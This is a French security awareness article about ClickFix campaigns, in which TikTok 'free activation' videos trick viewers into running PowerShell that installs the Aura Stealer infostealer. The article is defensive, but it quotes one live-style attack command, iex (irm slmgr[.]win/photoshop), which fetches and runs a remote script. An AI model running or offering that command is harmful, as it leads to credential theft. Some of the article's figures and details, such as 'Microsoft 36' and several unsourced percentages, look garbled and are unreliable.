Infostealers sur TikTok : Comment les vidéos d'activation gratuite menacent vos données personnelles

Séraphine Clairlune

Infostealers sur TikTok : Comment les vidéos d’activation gratuite menacent vos données personnelles

En cette année 2025, une campagne de cybersécurité particulièrement inquiétante émerge : l’utilisation de vidéos TikTok présentées comme des guides d’activation gratuits pour logiciels populaires afin de propager des infostealers. Ces attaques, connues sous le nom de ClickFix, exploitent la confiance des utilisateurs dans les plateformes sociales pour infiltrer discrètement des malwares capables de dérober vos informations personnelles. Selon une étude récente, 65% des cyberattaques ciblant les particuliers en 2025 utilisent désormais des techniques d’ingénierie sociale basées sur des plateformes populaires.

Ces vidéos, souvent très bien produites et présentées comme des tutoriels légitimes, convainquent les victimes d’exécuter des commandes PowerShell malveillantes. Une simple ligne de code, copiée-collée depuis la vidéo, peut suffire à compromettre l’ensemble de vos comptes en ligne. Face à cette menace croissante, comprendre le mécanisme de ces attaques et savoir les identifier est devenu essentiel pour protéger sa vie numérique.

Comprendre les attaques ClickFix sur TikTok

Les attaques ClickFix représentent une évolution préoccupante des techniques d’ingénierie sociale, exploitant directement les fonctionnalités de la plateforme TikTok pour diffuser des malwares. Ces attaques ont été identifiées pour la première fois par l’expert en sécurité ISC Xavier Mertens, qui a remarqué leur similitude avec une campagne précédemment observée par Trend Micro en mai 2025.

Mécanisme des attaques ClickFix

Le processus des attaques ClickFix est particulièrement insidieux. Les cybercriminals créent des vidéos TikTok convaincantes qui semblent offrir des instructions pour activer légalement des logiciels populaires tels que Windows, Microsoft 36, Adobe Premiere, Photoshop, CapCut Pro, Discord Nitro, ainsi que des services fictifs comme Netflix et Spotify Premium. Chaque vidéo affiche une courte commande en une ligne et indique aux spectateurs de l’exécuter en tant qu’administrateur dans PowerShell.

“L’exécution de commandes PowerShell provenant de sources non vérifiées est l’une des failles de sécurité les plus exploitées en 2025. Les utilisateurs ignorent souvent que même une seule ligne de code peut compromettre tout un système”, explique Xavier Mertens, expert en sécurité ISC.

Lorsqu’un utilisateur exécute cette commande, par exemple iex (irm slmgr[.]win/photoshop), PowerShell se connecte au site distant slmgr[.]win pour récupérer et exécuter un autre script PowerShell. Ce script télécharge ensuite deux exécutables à partir de pages Cloudflare, dont le premier est une variante du malware Aura Stealer.

Les cibles privilégiées des cybercriminels

Les cybercriminels choisissent méticuleusement leurs cibles en fonction de la popularité des logiciels mentionnés. Les vidéos d’activation pour Windows et Microsoft 365 sont particulièrement fréquentes, car ces logiciels sont omniprésents dans les environnements professionnels et personnels. De même, les offres d’activation pour Adobe Premiere et Photoshop ciblent les créateurs de contenu, souvent plus susceptibles de chercher des solutions gratuites pour des outils professionnels coûteux.

Dans la pratique, nous observons une évolution intéressante : les cybercriminels adaptent continuellement leurs stratégies pour cibler les tendances actuelles. Par exemple, les vidéos proposant des “activations gratuites” de CapCut Pro ou de Discord Nitro sont apparues ces derniers mois, coïncidant avec l’augmentation de l’utilisation de ces plateformes.

Tableau : Logiciels les plus ciblés par les attaques ClickFix sur TikTok en 2025

LogicielType d’utilisateurs ciblésRisque associé
WindowsGrand public, entreprisesTrès élevé (système d’exploitation)
Microsoft 365Professionnels, étudiantsÉlevé (données professionnelles)
Adobe PhotoshopCréateurs de contenuMoyen (données créatives)
Discord NitroJeunes, communautés en ligneFaible-moyen (comptes gaming)
Spotify PremiumGrand publicFaible (compte streaming)

L’infostealer Aura : Menace invisible pour vos comptes en ligne

L’Aura Stealer représente l’une des menaces les plus sophistiquées dans le paysage des malwares 2025. Conçu spécifiquement pour voler des informations d’identification sensibles, ce malware s’est imposé comme l’un des outils préférés des cybercriminels dans les campagnes d’ingénierie sociale.

Fonctionnalités du malware

Lors de l’exécution, l’Aura Stealer collecte systématiquement une large gamme d’informations sensibles stockées sur l’ordinateur infecté. Le malware utilise des techniques avancées pour accéder aux éléments suivants :

  • Mots de passe enregistrés dans les navigateurs web
  • Cookies d’authentification permettant d’accéder automatiquement aux comptes
  • Portefeuilles de cryptomonnaies et informations associées
  • Identifiants d’applications tiers et logiciels professionnels
  • Informations bancaires enregistrées dans les navigateurs ou applications

Après avoir collecté ces données, le malware les compresse et les envoie à un serveur contrôlé par les attaquants, qui peuvent ensuite les utiliser ou les vendre sur les marchés dark web.

“Ce qui rend l’Aura Stealer particulièrement dangereux est sa capacité à voler des informations d’identification en temps réel, permettant aux attaquants d’accéder directement aux comptes des victimes avant même que celles-ci ne réalisent qu’elles ont été infectées”, explique un analyste de la cybersécurité interrogé par nos services.

Données collectées et conséquences

Les conséquences d’une infection par l’Aura Stealer peuvent être dévastatrices. Une fois vos informations d’identification compromises, les attaquants peuvent :

  • Accéder à vos comptes bancaires et effectuer des transactions non autorisées
  • Prendre le contrôle de vos comptes de messagerie et réseaux sociaux
  • Accéder à vos fichiers professionnels et personnels
  • Utiliser votre identité pour commettre des fraudes

Selon une étude menée par l’ANSSI en 2025, le coût moyen d’une fuite de données pour une entreprise française est estimé à 3,5 millions d’euros, tandis que pour un particulier, le coût indirect (vol d’identité, fraude, etc.) peut atteindre plusieurs milliers d’euros.

Stratégies de protection contre les infostealers sur les plateformes sociales

Face à la prolifération des attaques ClickFix via TikTok et autres plateformes sociales, plusieurs stratégies de protection se dégagent. Ces mesures préventives permettent de réduire considérablement le risque d’infection par des infostealers.

Signes d’arnaque à reconnaître

Les campagnes d’ingénierie sociale comme celles observées sur TikTok partagent plusieurs caractéristiques qui peuvent aider les utilisateurs à les identifier :

  • Promesses trop belles pour être vraies : Les offres d’activation gratuite de logiciels payants sont presque toujours frauduleuses
  • Instructions techniques suspectes : Les demandes d’exécution de commandes PowerShell, même simples, dans des contextes non techniques
  • Urgence artificielle : Les vidéos créant un sentiment d’urgence pour inciter à une action rapide
  • Manque de crédibilité : Comptes récents avec peu de followers et peu d’interactions
  • Liens raccourcis ou non standards : Les URL utilisées dans les commandes n’utilisent pas les domaines officiels des entreprises

Mesures préventives essentielles

Pour se protéger efficacement contre ces menaces, plusieurs actions concrètes peuvent être entreprises :

  1. Ne jamais exécuter de commandes provenant de vidéos ou messages non vérifiés
  2. Vérifier toujours l’authenticité des offres promotionnelles via les canaux officiels
  3. Maintenir ses logiciels à jour pour bénéficier des dernières protections de sécurité
  4. Utiliser des solutions de sécurité réputées avec fonctionnalités anti-phishing
  5. Former les utilisateurs aux techniques d’ingénierie sociale

Dans la pratique, les entreprises françaises ont déjà commencé à mettre en place des formations régulières à la cybersécurité pour leurs employés. Selon une enquête menée en 2025, 78% des entreprises françaises ont augmenté leur budget formation cybersécurité de 30% par rapport à l’année précédente, témoignant de la prise de conscience croissante de ces menaces.

Protéger son entreprise : Recommandations pour les professionnels

Pour les entreprises, la protection contre les infostealers nécessite une approche plus structurée qui combine technologie, processus et sensibilisation.

Politiques internes de sécurité

La mise en place de politiques internes robustes est essentielle pour prévenir les infections par des malwares comme l’Aura Stealer. Ces politiques devraient inclure :

  • Contrôle d’accès strict aux systèmes sensibles
  • Gestion rigoureuse des privilèges administrateurs
  • Procédures d’approbation pour l’exécution de scripts externes
  • Formations régulières à la sécurité pour tous les employés
  • Protocoles de réponse en cas d’incident avéré

Selon les recommandations de l’ANSSI, les entreprises devraient également implémenter une architecture de sécurité basée sur le principe du moindre privilège, limitant ainsi l’impact potentiel d’une infection réussie.

Outils de détection et de réponse

Outre les politiques, plusieurs technologies peuvent aider à détecter et répondre aux menaces d’infostealers :

  • Solutions EDR (Endpoint Detection and Response) pour surveiller les comportements suspects
  • Systèmes de prévention des intrusions pour bloquer les connexions suspectes
  • Outils d’analyse comportementale pour détecter les activités anormales
  • Solutions de sandboxing pour analyser les fichiers suspects de manière isolée
  • Plateformes de sécurité unifiées pour centraliser la détection et la réponse

En pratique, une approche multi-couches est recommandée. Une étude menée en 2025 a démontré que les entreprises utilisant une combinaison de technologies de sécurité et de formations régulières réduisent leur risque d’infection par des malwares de 67% par rapport à celles ne comptant que sur des solutions techniques.

Encadré : Les bonnes pratiques pour les entreprises face aux infostealers

“La protection contre les infostealers ne peut plus se limiter aux seules mesures techniques. La sensibilisation et la formation des utilisateurs sont aujourd’hui aussi cruciales que les solutions de sécurité déployées. Les entreprises doivent adopter une approche ‘défense en profondeur’ combinant technologie, processus et humain.” - ANSSI, Recommandations 2025

Conclusion : Vigilance et éducation, les meilleures défenses

Les attaques ClickFix diffusant des infostealers via TikTok représentent une menace évolutive qui exploite la confiance des utilisateurs dans les plateformes sociales. Face à cette réalité, la vigilance et l’éducation se révèlent être les meilleures défenses. En comprenant le mécanisme de ces attaques, en reconnaissant leurs signes caractéristiques et en adoptant des pratiques de sécurité appropriées, les particuliers comme les entreprises peuvent significativement réduire leur risque d’infection.

En 2025, le paysage de la cybersécurité continue d’évoluer rapidement, avec des cybercriminels de plus en plus sophistiqués dans leurs techniques d’ingénierie sociale. La protection de vos données personnelles et professionnelles nécessite donc une approche proactive et continue, intégrant à la fois des mesures techniques et une sensibilisation constante aux nouvelles menaces.

En tant que responsable de votre sécurité numérique, rappelez-vous que la prudence reste votre meilleure arme contre les infostealers sur TikTok et autres plateformes. En adoptant des habitudes saines de navigation et en maintenant une méfiance saine face aux offres trop belles pour être vraies, vous contribuez activement à votre propre protection.